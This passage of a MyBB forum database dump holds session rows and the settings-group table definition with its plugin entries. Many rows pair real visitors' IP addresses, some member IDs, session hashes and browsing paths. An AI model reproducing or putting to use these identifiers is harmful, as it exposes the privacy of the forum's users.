VALUES('c38cd29b80c39bb354d5498701e19ac9', '343', '14.194.176.168', '1352609966', '/showthread.php?tid=335', 'Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.29915/28.2957; U; en) Presto/2.8.119 Version/11.10', '0', '0', '25', '335'); INSERT INTO mybb_sessions VALUES('55bf1c598dec2eb55c3a44506950f3b3', '0', '220.245.153.55', '1352605522', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ac5150004e07a6a8b738d38051dbf58b', '0', '157.56.93.201', '1352695206', '/showthread.php?tid=824', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '4', '824'); INSERT INTO mybb_sessions VALUES('811c0ef4a9909f553cc9ea9eba58873d', '0', '50.18.21.225', '1352675542', '/index.php?', 'UnwindFetchor/1.0 (+http://www.gnip.com/)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('fd794e3219858c992ac8240df0de6f06', '0', '65.52.0.95', '1352596968', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('73c464dede5df857fec6817b86e0e423', '0', '199.47.120.214', '1352594439', '/member.php?action=profile&amp;uid=314', 'Zend_Http_Client', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('4c8e54fb39176330e8fd610bc7b18817', '61', '99.252.235.12', '1352738381', '/usercp.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b51f745c30921bfe7ae82b0cc99c34c9', '0', '69.207.144.179', '1352602661', '/showthread.php?tid=848', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0', '0', '0', '12', '848'); INSERT INTO mybb_sessions VALUES('30e7b16ba28a2040de9ded17c4ffb3eb', '0', '173.245.64.148', '1352612925', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('850d4ad25e014877ce40f664a88f20bc', '0', '82.103.128.63', '1352759328', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('42ee2f29e3667771c0366178c94c0819', '0', '199.15.234.60', '1352687441', '/misc.php?action=help&amp;hid=16', 'Opera/9.80 (Windows NT 5.1; U; MRA 5.10 (build 5339); ru) Presto/2.10.229 Version/11.64', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('71aab04efbf900518a9322de3922296b', '0', '5.152.197.2', '1352630828', '/showthread.php?tid=766', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '20', '766'); INSERT INTO mybb_sessions VALUES('5ce6c50bf79d18cb59078f7e4fd604aa', '342', '96.21.227.16', '1352756278', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9993870dcae2ac5132780f0c323977d5', '0', '98.254.3.237', '1352642928', '/search.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('28d994295f74153b958166dc5ec4749d', '0', '121.54.47.52', '1352625792', '/member.php?&amp;action=do_login', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3905bd329c3fc807cc9208ab765ea25b', '0', '123.23.218.116', '1352622844', '/member.php?&amp;action=do_register', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f216a3602a0b3a19293b123cd7c2a629', '345', '116.203.56.36', '1352656392', '/showthread.php?tid=1252', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '49', '1252'); INSERT INTO mybb_sessions VALUES('7d329c170315a683f1198a3c34673e1c', '0', '71.198.228.237', '1352676327', '/forumdisplay.php?fid=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.12', '0', '0', '7', '0'); INSERT INTO mybb_sessions VALUES('b2ef3c0e062f40780726589a14e3f13d', '0', '65.55.24.239', '1352747674', '/showthread.php?tid=896', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '23', '896'); INSERT INTO mybb_sessions VALUES('0e750d8fdc87f1bcd72e4867bf9f1319', '0', '5.9.40.98', '1352729598', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bot=1', '0', '66.249.74.52', '1352759053', '/showthread.php?tid=900', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', '0', '0', '63', '900'); INSERT INTO mybb_sessions VALUES('9bdd4d6b718d62ee3e1b971ba14c9941', '0', '125.60.249.242', '1352625079', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0 CometBird/11.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('746336362e9caff503c70bfc29ea17b9', '0', '79.86.66.235', '1352625142', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('baab9d198a465b73746a99a92be3f6a3', '0', '68.108.73.189', '1352646770', '/member.php?&amp;action=do_register', 'Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2aaba681adb71bdd9876fd8bb28227b7', '0', '178.33.154.135', '1352649130', '/member.php?&amp;action=register', 'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7767ae5f2f451997eaaa7a59f100d09b', '0', '74.125.183.18', '1352633901', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('cfadffd1e3e5d84c2fc87cf910266d53', '62', '173.245.49.14', '1352758538', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('54efbd858c9193d2e6c0453b7254ab1f', '0', '117.216.164.11', '1352716328', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('28d1581f3b4f13ab62ebcc461fa2dccc', '0', '65.55.52.115', '1352690686', '/showthread.php?tid=690&amp;action=lastpost', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '69', '690'); INSERT INTO mybb_sessions VALUES('93d72ee1585bc65ae0971000994fc34f', '0', '130.43.55.208', '1352658023', '/showthread.php?tid=1222', 'Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02', '0', '0', '13', '1222'); INSERT INTO mybb_sessions VALUES('3981d7cc4efef483eef0023f6ed53bcf', '0', '108.227.174.34', '1352664017', '/index.php?', 'Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('42f53161c2c90484cda41061096a9ddf', '0', '173.245.52.14', '1352757927', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f64d1837b4a37bebe8e93b7d3976d07c', '0', '41.141.159.76', '1352665648', '/member.php?&amp;action=register', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bf1b4197573a0d9b2e54f12ed84f9e07', '0', '173.245.64.194', '1352676365', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f1a5a9d053a0471d31d91f6edcca561c', '0', '69.164.202.68', '1352703513', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8f78d1fdaa62a0e0543068774fbdb294', '257', '203.104.11.14', '1352750899', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3d5b72fe4bfe2c6878115b3c9d0457a0', '0', '72.231.24.165', '1352699464', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2779be817536be93f3d41913984e8d8d', '0', '143.2.214.77', '1352681428', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('0f0fc58c7db67e13ac2ed8183eacefe9', '0', '52.169.100.228', '1352681455', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('47a317481a4852757c7de656d498f4cc', '0', '63.88.48.193', '1352681483', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('dfdc838d5ddb5d81e6b8e34573790edf', '0', '3.76.47.138', '1352681514', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8953f882002febdfb2ebf67eb4562ecd', '0', '198.20.67.66', '1352681981', '/index.php?', '', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2dc8a2a0681647a61e67097b195ceded', '0', '173.245.52.11', '1352754268', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('fe13c7efcc5dd03e02d93653d6144999', '0', '49.248.27.150', '1352686953', '/~lthackin/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('cf5353328c1c79ed240716501cf676b4', '0', '108.174.155.10', '1352710640', '/index.php?', 'SiteCheck - http://downforeveryoneorjustme.com', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('dc83db58f40af31bf5d8d7731377ae4d', '0', '74.125.183.27', '1352687603', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7717ab19221d1e10fe4e031df4f3ebdd', '0', '74.91.117.201', '1352686091', '/index.php?', '', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9a93a6b6332e4e585ebc310efc82cb91', '0', '50.14.114.81', '1352686502', '/index.php?', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2763f9a2be5523ab9895dfea1a5c5741', '0', '24.9.159.6', '1352686252', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('5e017aebabc92d584a51b1f4af3dc18e', '0', '72.241.225.135', '1352686231', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7a681e9b2e4234f8be9bb193c65fa19e', '0', '192.200.145.158', '1352688101', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2c306c142183022bec65bda92563140b', '0', '173.245.50.14', '1352686246', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7c26714ee5f54bb6068909bb834f855c', '0', '173.245.55.11', '1352686398', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('cc765f16e1a38b287f2a0aa308495574', '0', '74.125.182.20', '1352686385', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6025286abfa8b798a0a5cc4ee2bfd468', '0', '65.55.55.230', '1352758865', '/showthread.php?tid=123', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '14', '123'); INSERT INTO mybb_sessions VALUES('6360bf9a1208c51d12cbad54e61403ee', '0', '157.55.33.20', '1352724984', '/forumdisplay.php?fid=63', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '63', '0'); INSERT INTO mybb_sessions VALUES('975c0e7968e51c093e56d44de9a43c70', '0', '157.55.33.40', '1352723325', '/showthread.php?tid=1187', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '7', '1187'); INSERT INTO mybb_sessions VALUES('40244cba24c9564e4a01546e1660c19a', '0', '99.240.26.178', '1352692016', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('4a8f312587f7a91b3a8dd562cdc6d0a8', '0', '108.162.240.5', '1352692024', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8fd130bac7a987c02008d37c5b77233f', '0', '174.54.231.99', '1352707986', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c589cbda78caf2baf8f3679144d9ea9f', '0', '173.245.56.14', '1352708119', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6ca627128e76b6301768c44dd3ee734d', '0', '157.55.33.253', '1352708331', '/showthread.php?tid=643', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '7', '643'); INSERT INTO mybb_sessions VALUES('46d1e1d22640d663bc39ac74edf219c4', '0', '74.125.183.24', '1352717068', '/index.php?', 'AppEngine-Google; (+http://code.google.com/appengine; appid: downforeveryoneorjustme)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c5626e4d9960adae8bd46b55dd7bc6ea', '0', '91.236.74.177', '1352717807', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('19f16544cf90aa24a663c18c40821047', '0', '199.21.99.84', '1352749512', 'forum-16.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('aaf2b008178aadfe59f314453b3a7659', '0', '58.111.133.131', '1352720292', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('1d9a4bb4b0e6e949f3444895000b4012', '0', '178.40.202.187', '1352726264', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.5 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('d0151c4b2dddc663ff429fc2dd45912f', '0', '209.73.132.182', '1352727022', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('1df8d31753afebd6ec2632bf16aada68', '0', '69.164.209.129', '1352728990', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3187f2807330107c6ceba28dda43e5bf', '0', '83.82.49.39', '1352753230', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b0a8dd4c158202bace9172a2081b9a15', '0', '119.56.76.52', '1352732558', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bf181e751361990624eeb4766d5cb027', '0', '178.135.103.214', '1352741582', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3d6e24720bf49d6cbccc3c1fcfe7ab80', '0', '31.185.242.74', '1352746393', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '10', '0'); INSERT INTO mybb_sessions VALUES('ce6098e300a198ad3b0660f24d1faf5f', '0', '195.64.77.128', '1352746719', '/index.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('31daa63fcdc27e6e8356a4e7000985cb', '0', '66.45.50.29', '1352747591', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('589c93e250403ba2e7f89691d94cf85e', '0', '173.245.64.154', '1352747859', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('25eaa0e4922d7c7a906ddd2fd8d9fdad', '0', '86.0.167.238', '1352748358', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('431c3dc99c2610fdb08701eacfd763fd', '0', '192.200.145.148', '1352758114', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('574b07c337926a7f01891a4cb5617164', '4', '49.248.27.150', '1352748875', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('23976f5b53363994aaabacdcd83d4382', '0', '59.99.254.53', '1352749139', '/~lthackin/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('99f844c4a47b696f8a4f2f49f9a4fbcd', '0', '193.200.150.82', '1352749143', '/index.php?', 'http://Anonymouse.org/ (Unix)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7d7bd75a5f64f026ec1dc2d48f3dd136', '0', '103.22.201.11', '1352749480', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('54fb1a0836a1b244d877f04573d02ff3', '0', '174.47.215.254', '1352749649', '/index.php?', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6083b494414e71f2724f07e12d2561ef', '0', '99.104.51.221', '1352752320', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('57d781b914f5dc89563dc02ab1dcbe37', '0', '150.70.64.209', '1352752578', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('79fced592c07e09c374892fcaf910db3', '0', '71.192.17.34', '1352754297', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bb4d4a48a5941e953782725409f3b468', '0', '173.230.141.114', '1352754432', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b0657fa309a78cddb98da979fa53319b', '0', '50.23.65.53', '1352758736', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('d646b640d850e3182961d63234b938ae', '100', '173.245.52.14', '1352759375', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); DROP TABLE IF EXISTS mybb_settinggroups; CREATE TABLE mybb_settinggroups ( gid smallint(5) unsigned NOT NULL auto_increment, name varchar(100) NOT NULL, title varchar(220) NOT NULL, description text NOT NULL, disporder smallint(5) unsigned NOT NULL, isdefault int(1) NOT NULL, PRIMARY KEY (gid) ); INSERT INTO mybb_settinggroups VALUES('1', 'calendar', 'Calendar', 'The board calendar allows the public and private listing of events and members\' birthdays. This section allows you to control and manage the settings for the Calendar.', '14', '1'); INSERT INTO mybb_settinggroups VALUES('2', 'clickablecode', 'Clickable Smilies and BB Code', 'This section allows you to change how the clickable smilies inserter appears.', '20', '1'); INSERT INTO mybb_settinggroups VALUES('3', 'cpprefs', 'Control Panel Preferences (Global)', 'This section allows you to set the global preferences for the Admin Control Panel.', '21', '1'); INSERT INTO mybb_settinggroups VALUES('4', 'datetime', 'Date and Time Formats', 'Here you can specify the different date and time formats used to display dates and times on the forums.', '4', '1'); INSERT INTO mybb_settinggroups VALUES('5', 'forumdisplay', 'Forum Display Options', 'This section allows you to manage the various settings used on the forum display (forumdisplay.php) of your boards such as enabling and disabling different features.', '6', '1'); INSERT INTO mybb_settinggroups VALUES('6', 'forumhome', 'Forum Home Options', 'This section allows you to manage the various settings used on the forum home (index.php) of your boards such as enabling and disabling different features.', '5', '1'); INSERT INTO mybb_settinggroups VALUES('7', 'general', 'General Configuration', 'This section contains various settings such as your board name and url, as well as your website name and url.', '2', '1'); INSERT INTO mybb_settinggroups VALUES('8', 'mailsettings', 'Mail Settings', 'This section allows you to control various aspects of the MyBB mail system, such as sending with PHP mail or with a off server SMTP server.', '22', '1'); INSERT INTO mybb_settinggroups VALUES('9', 'member', 'User Registration and Profile Options', 'Here you can control various settings with relation to user account registration and account management.', '8', '1'); INSERT INTO mybb_settinggroups VALUES('10', 'memberlist', 'Member List', 'This section allows you to control various aspects of the board member listing (memberlist.php), such as how many members to show per page, and which features to enable or disable.', '10', '1'); INSERT INTO mybb_settinggroups VALUES('11', 'onlineoffline', 'Board Online / Offline', 'These settings allow you to globally turn your forums online or offline, and allow you to specify a reason for turning them off.', '1', '1'); INSERT INTO mybb_settinggroups VALUES('12', 'portal', 'Portal Settings', 'The portal page compiles several different pieces of information about your forum, including latest posts, who\'s online, forum stats, announcements, and more. This section has settings to control the aspects of the portal page (portal.php).', '17', '1'); INSERT INTO mybb_settinggroups VALUES('13', 'posting', 'Posting', 'These options control the various elements in relation to posting messages on the forums.', '9', '1'); INSERT INTO mybb_settinggroups VALUES('14', 'privatemessaging', 'Private Messaging', 'Various options with relation to the MyBB Private Messaging system (private.php) can be managed and set here.', '13', '1'); INSERT INTO mybb_settinggroups VALUES('15', 'reputation', 'Reputation', 'The reputation system allows your users to rate others and leave a comment on the user. This section has settings to disable and change other aspects of the reputation page (reputation.php).', '10', '1'); INSERT INTO mybb_settinggroups VALUES('16', 'search', 'Search System', 'The various settings in this group allow you to make changes to the built in search mechanism for threads and posts in MyBB.', '18', '1'); INSERT INTO mybb_settinggroups VALUES('17', 'server', 'Server and Optimization Options', 'These options allow you to set various server and optimization preferences allowing you to reduce the load on your server, and gain better performance on your board.', '3', '1'); INSERT INTO mybb_settinggroups VALUES('18', 'showthread', 'Show Thread Options', 'This section allows you to manage the various settings used on the thread display page (showthread.php) of your boards such as enabling and disabling different features.', '7', '1'); INSERT INTO mybb_settinggroups VALUES('19', 'warning', 'Warning System Settings', 'The warning system allows forum staff to warn users for rule violations. Here you can manage the settings that control the warning system.', '11', '1'); INSERT INTO mybb_settinggroups VALUES('20', 'whosonline', 'Who\'s Online', 'Various settings regarding the Who is Online functionality.', '15', '1'); INSERT INTO mybb_settinggroups VALUES('21', 'userpruning', 'User Pruning', 'User Pruning allows you to remove users from your forum meeting certain criteria. Here you can configure that criteria.', '16', '1'); INSERT INTO mybb_settinggroups VALUES('22', 'Contact', 'Contact', 'Add a contact form to your site.', '61', '0'); INSERT INTO mybb_settinggroups VALUES('26', 'hellban', 'Hellban Settings', 'Settings for the hellban plugin.', '0', '0'); INSERT INTO mybb_settinggroups VALUES('27', 'g33k_welcomepm_settings', 'Welcome PM/Email', 'Settings to customize the Welcome PM/Email Plugin', '62', '0'); INSERT INTO mybb_settinggroups VALUES('29', 'donationpage', 'Donation Page Settings', 'Set up and edit your donation page here.', '35', '0'); INSERT INTO mybb_settinggroups VALUES('44', 'goodbyespammer', 'Goodbye Spammer Settings', 'Settings for the goodbye spammer plugin.', '28', '0'); INSERT INTO mybb_settinggroups VALUES('35', 'ForumsRequirements', 'Forums Requirements', 'Configura plugin para mostrar mensaje de error', '0', '0'); INSERT INTO mybb_settinggroups VALUES('36', 'strictUsername', 'Strict Username', 'Settings for plugin \"Strict Username\"', '102', '0'); INSERT INTO mybb_settinggroups VALUES('37', 'myflood', 'MyFlood Settings', 'Settings for MyFlood.', '1', '0'); INSERT INTO mybb_settinggroups VALUES('39', 'moderation_posts', 'Moderation Posts Count', 'Settings for the plugin.', '1', '0'); INSERT INTO mybb_settinggroups VALUES('42', 'hidelinks_settings', 'Hide Links to Guests', 'Settings for Hide Links to Guests plugin.', '100', '0'); INSERT INTO mybb_settinggroups VALUES('45', 'google_seo', 'Google SEO', 'Enable or disable the main features of Google SEO.', '103', '0'); INSERT INTO mybb_settinggroups VALUES('46', 'google_seo_404', 'Google SEO 404', '(Advanced Users) 404 error page settings for the Google Search Engine Optimization plugin.', '104', '0'); INSERT INTO mybb_settinggroups VALUES('47', 'google_seo_meta', 'Google SEO Meta', '(Advanced Users) Meta tag settings for the Google Search Engine Optimization plugin.', '105', '0'); INSERT INTO mybb_settinggroups VALUES('48', 'google_seo_redirect', 'Google SEO Redirect', '(Advanced Users) Redirection settings for the Google Search Engine Optimization plugin.', '106', '0'); INSERT INTO mybb_settinggroups VALUES('49', 'google_seo_sitemap', 'Google SEO Sitemap', '(Advanced Users) Sitemap settings for the Google Search Engine Optimization plugin.', '107', '0'); INSERT INTO 